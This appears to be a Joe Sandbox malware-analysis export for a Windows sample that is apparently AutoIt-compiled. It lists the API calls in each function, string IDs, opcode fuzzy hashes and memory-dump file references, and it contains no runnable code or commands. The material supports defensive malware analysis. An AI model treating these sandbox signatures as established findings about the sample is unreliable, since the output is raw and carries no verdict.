                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0$2
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 93392585-3793063076
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00435320
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: crts
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 586820018-3724388283
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                                                                                                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0044BCAF
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0044BCBB
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0044BCD1
                                                                                                                                                                                                                                                                                                                                                                                                                                • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: \*.*
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2326526234-1173974218
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 004335F2
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0043362B
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsrchr.LIBCMT ref: 00433666
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: \
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 321622961-2967466578
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __wcsnicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1038674560-2734436370
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadStringW.USER32(00000000), ref: 00434060
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadStringW.USER32(00000000), ref: 00434078
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wprintf.LIBCMT ref: 004340A1
                                                                                                                                                                                                                                                                                                                                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3648134473-3128320259
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                                                                                                                                                                                                                                                                                                                                                                                • __lock.LIBCMT ref: 00417981
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                                                                                                                                                                                                                                                                                                                                                                                • __lock.LIBCMT ref: 004179A2
                                                                                                                                                                                                                                                                                                                                                                                                                                • ___addlocaleref.LIBCMT ref: 004179C0
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: KERNEL32.DLL$pI
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 637971194-197072765
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _memmove$_malloc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1938898002-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00434EE8
                                                                                                                                                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00434F0B
                                                                                                                                                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00434F37
                                                                                                                                                                                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00434F3E
                                                                                                                                                                                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00434F64
                                                                                                                                                                                                                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00434F6D
                                                                                                                                                                                                                                                                                                                                                                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 00434FA8
                                                                                                                                                                                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00434FB6
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 077a930adce2e2e575ae573d9966b00f654a320f8e1671167757538259768175
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 62a2b3f98caf240b0b87dceec1cde1b3ad41479520e9ab1bd59fe61f77259947
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 077a930adce2e2e575ae573d9966b00f654a320f8e1671167757538259768175
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A631A5327001186BC710AB99EC49FEFB7A8EB8C731F14427BFA09D7290DA759844C7A4
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00440F24
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 00440F2C
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00440F38
                                                                                                                                                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 00440F46
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,00000000), ref: 00440F90
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00440FA7
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00440FDD
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00440FFF
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: fef0053c073632ff5c176fa8d0eb2aaca295a54c025a4b12eac0c4782f4ea02e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d9fc15c341c8c83caa3938f749aa41814f3de42eaf1e3e6405ddac876be99683
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fef0053c073632ff5c176fa8d0eb2aaca295a54c025a4b12eac0c4782f4ea02e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F13164B16402147FEB14CF54DC89FAB3799EB98B15F048169FE08DE2C5D6B9E840CB64
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00434FF2
                                                                                                                                                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00435017
                                                                                                                                                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00435043
                                                                                                                                                                                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 0043504A
                                                                                                                                                                                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00435072
                                                                                                                                                                                                                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0043507B
                                                                                                                                                                                                                                                                                                                                                                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 0043509B
                                                                                                                                                                                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 004350A9
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ee35db800600f3cc28c1728c86170bfab7cf2c43a8d594881b808c5ba37eb322
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f42878b2159185360852a952fd690a32193869b943547c3e204aa20c586f66a1
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee35db800600f3cc28c1728c86170bfab7cf2c43a8d594881b808c5ba37eb322
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD21B4327001146BD710ABA9EC49FAF73A8EB9D731F04427BFA05DB390DAA5984487F5
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                                                                                                                                                                                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                                                                                                                                                                                                                                                                                                                                                                                • _memmove.LIBCMT ref: 0044B555
                                                                                                                                                                                                                                                                                                                                                                                                                                • _memmove.LIBCMT ref: 0044B578
                                                                                                                                                                                                                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                                                                                                                                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2737351978-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                                                                                                                                                                                                                                                                                                                                                                                • __calloc_crt.LIBCMT ref: 00415246
                                                                                                                                                                                                                                                                                                                                                                                                                                • __getptd.LIBCMT ref: 00415253
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                                                                                                                                                                                                                                                                                                                                                                                • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                                                                                                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0041529E
                                                                                                                                                                                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 004152A9
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3638380555-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Variant$Copy$ClearErrorInitLast
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3207048006-625585964
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                                                                                                                                                                                                                                                                                                                                                • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                                                                                                                                                                                                                                                                                                                                                                                • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                                                                                                                                                                                                                                                                                                                                                                                • _memmove.LIBCMT ref: 004656CA
                                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                                                                                                                                                                                                                                                                                                                                                                                • WSACleanup.WSOCK32 ref: 00465762
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2945290962-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
